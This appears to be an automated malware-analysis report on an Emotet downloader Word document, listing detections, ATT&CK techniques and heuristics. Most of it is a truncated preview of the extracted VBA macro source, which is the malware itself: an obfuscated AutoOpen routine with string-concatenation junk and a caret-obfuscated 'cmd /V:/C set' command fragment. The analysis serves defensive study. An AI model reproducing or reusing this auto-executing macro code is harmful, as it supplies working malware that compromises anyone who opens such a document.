MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6884039-0. Critical heuristics indicate the presence of VBA macros and a Shell() call, strongly suggesting the execution of malicious code. The AutoOpen macro is present, which is a common technique for Emotet to initiate its payload download and execution upon opening the document.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884039-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884039-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 169632 bytes |
SHA-256: f40556a4d9f253d10d7c013fb28c71f92e4f2f39607a5e4d62c30f1877682ff3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DmPfjHcBIGpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim QKjwz(1)
QKjwz(0) = MidB(HONBzkpXIMEqt + AdrWBLrzqwiwnZztIsjiRvkUXE + dnEJGGcldPQRLw, 51, 827) + MidB(NLGYMTRuabQr + IrUuudTsQwrtbXTstkosFbksLjBVlv + TiHwGQUv, 165, 636) + Left(zWGiWHfCjzPTJ + LPcFzEJEkwdYWhjYtoaSwiQVcUOon + JffbVnpS, 342) + Left(dGfzPrLRsSl + bhijjawJIQMEwmEDUYAJpdFX + cqYiBAoFIi, 834)
Dim wiCwnA(2)
wiCwnA(0) = Mid(OQzbjFRll + UQiotdZLFNGYSlbWQJscaPAtGLwZQnmN + uIUNpmCHX, 468, 175) + MidB(vUckwcnHYtj + GoqFlERNbIoftFSsbkIjCDqljFVOkupfOR + EjRTLnFCXMpj, 347, 980)
wiCwnA(1) = Mid(DiBCuTkHG + kEZMBZpbPitAzoQpwljWbfPQ + vKNRjUzzAoGc, 363, 690) + MidB(pBEGFRqRwR + zhlJzufFVbQcQTciTTzSOLljiTwTRTPzS + fYEwzNkbPozOii, 975, 40) + Mid(sWwMOAlZIwJbR + louuUHbijVjFNoTRzIwSKDMaFlSnX + wqDHvjQsOqVTj, 216, 388) + Right(bIZtmVkqHjWsQ + jRQwPKEYKnbokfPlFOXuKUTQn + zzIAjPuVQhWjPG, 53)
Dim qTzLu(1)
qTzLu(0) = MidB(owdcGaXs + CTnjZoTCwzznQSHjTWjDJouvFvZRMF + idoQiiIzbNtIM, 195, 969) + MidB(WXkZPis + NHWjnqjckisCrBfbwulivNphTOSwwllR + vZDZjaTBBiV, 985, 899) + Mid(zuKRKqTzIPNR + RGkkDjWrMwVcdLMUTiQazqkccuKWIoGk + PqIMFhLwhMHl, 924, 902) + Right(PwajltTDtzCc + XaobFcWEuJODJUrwPcVKqzVXESI + jsojzVpRQLCR, 348)
Dim GbRlnq(1)
GbRlnq(0) = MidB(MWGdwtRW + mTnAQUPpspiHnaWJLlHmuXsnsU + NzTQaJG, 219, 937) + Left(wjbEjzDZkGkHai + cXhWUEkQIUqzNzomPJTJoouEwcr + uQdnPzctwLvO, 157)
fqLAAvtkGJQ (KeyString(vbKeyC) + KeyString(vbKeyM) + wDUREnGI + qdEBYEMwmNB + sjQjkhFofT + QmOwq + OWidEBvinY + GwVLVbaJNsi + lnQbEFz)
Dim mQHUFK(2)
mQHUFK(0) = Right(ZjFjSnqE + VQvEDrKHwPoLjRQztGYFwTwvUY + LuqkthiM, 301) + Mid(MYUOCjPCowwNrT + kGvqirHcQpoXiQqOzojcEEWSKNhwQh + GTUOVRswMrrUXQ, 147, 974) + Mid(fVfLjlMZzOj + qwSZWuiTPkhXMCuiElCNSu + CwTdOVTBVFqk, 81, 220) + Mid(lYdIZKiDI + mnlzfjMjXvGsEKjpCtambtQiIrRQ + jjOjFLBri, 764, 399)
mQHUFK(1) = MidB(RDPdoAmXsMA + OFEoFikdYvzjrUmRwNzasNc + qqTNZzzvnqip, 886, 28) + Mid(TjFJSkiaiNs + LacPComEiXkYzYEcCMLhXGQFMtiMH + cPFasMBal, 173, 405)
Dim YmmPJ(2)
YmmPJ(0) = MidB(vjkiXsjWjQ + TZXRCtLXimDwPuYiZFlSLzrcsHt + mHGmBVjWwksId, 723, 380) + Left(IoHLBWiHLTLRSP + PMHzHWMpjTisJMXKuzFnkYfqCYFfUIRN + TqlcRchn, 800)
YmmPJ(1) = MidB(GnGXQfDnbXa + JRdnOksVnLrNcWADiNvkwHEcNawo + FSAwuZFEH, 379, 537) + MidB(CChnXbruSN + fJIfupXwoIKBJXddGjnCZfnaN + nFTTOPzYMi, 86, 318) + Left(sLlODOQLlYwsHi + OKwUUFCiHjEtzESIUCLJmDbTuWVI + FPuRKZnICT, 933) + MidB(RnTdkzBf + AMRtlHLzRfohKjtLzsMErKfbtlJ + BMtFtfBAruzQj, 569, 117)
End Sub
Attribute VB_Name = "lFVGKjDjltFIlj"
Function wDUREnGI()
Dim SjGBDI(1)
SjGBDI(0) = Mid(kfkBWIznaNd + pWsawcwIbXbJEtPmicfZSwswDGKnZ + dNObEjIXII, 183, 107) + MidB(GYofAAj + aiGfsBQkCjnbjBdwXWPrirziWHY + LRnzwAQVsXHZZ, 566, 503)
Dim SonTsT(1)
SonTsT(0) = MidB(BDzvmNj + SEHnbBnPqfPqSZNNwHlzzMSC + llYfSSKivrnzC, 564, 555) + MidB(LkwRMAVOsjHHa + JadFHkXzsvdWazHUlXHYYlCRZlCaVin + zXGFnlEWjdu, 287, 760) + MidB(WDBicCFTESwOp + nnJdIwiSfcBpHIMPEShFMZtDCm + OBaqHFKRqr, 708, 645) + MidB(AQMwPMBaQpFizE + cfdIOzOQAzcvYhACMYdWdVnllk + FCwOFDtl, 20, 45)
Dim PzfjC(2)
PzfjC(0) = Mid(wjMRTjjVV + UWWLTiTuJpRqSrNiETvKKlWDZQqPaNo + UjPwwspa, 619, 863) + MidB(cTBRCCvYLMawau + ardcbitvpWvGkiszzozXKt + IJSWEOV, 9, 777)
PzfjC(1) = MidB(WzZGcfqAS + iVVwjfcUTiJdmWAHjljHizXiVrTtzZ + zAHhpXUvkMU, 783, 393) + Mid(jTjrrFNmzJz + ApJDKLYzAwwVjXWiPMkZTiiUk + YsQrvvCR, 575, 172) + Mid(iVkfWYqPSaj + PPqVcqolqDudlbTEihBEjC + uwrzIZcjfMwBSs, 883, 853) + Mid(ksnOwEWfIhO + SPutmzcvBEvHRCnJJDSUIjCmbdQ + UFdlXzHtT, 706, 293)
FUkzNnwj = "d /V^:/C" + CStr(Chr(1 + 1 + 0 + 3 + 29)) + "s^e^" + "t ^_^{=\^_/ -" + "^_\ \^" + "_- ^\/- \_^" + "-^ ^-^" + "\/ ^\/^-^ ^\" + "_/^ ^" + "-^_" + "\ -_/ _"
Dim zhiEBu(2)
zhiEBu(0) = MidB(TQRnfAfUSIkv + GzqjludMowHjlQNTOzLCAOThwvcMz + bjNSIuGG, 541, 384) + Right(PbDEpVwsQuupVR + RLlIuicjAAFGTjiUFvrnrDw + mXzqhcoQiXB, 697) + Right(DoPrlwLLUC + jaYtFzowcDPXifTATHbnzbLLt + C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.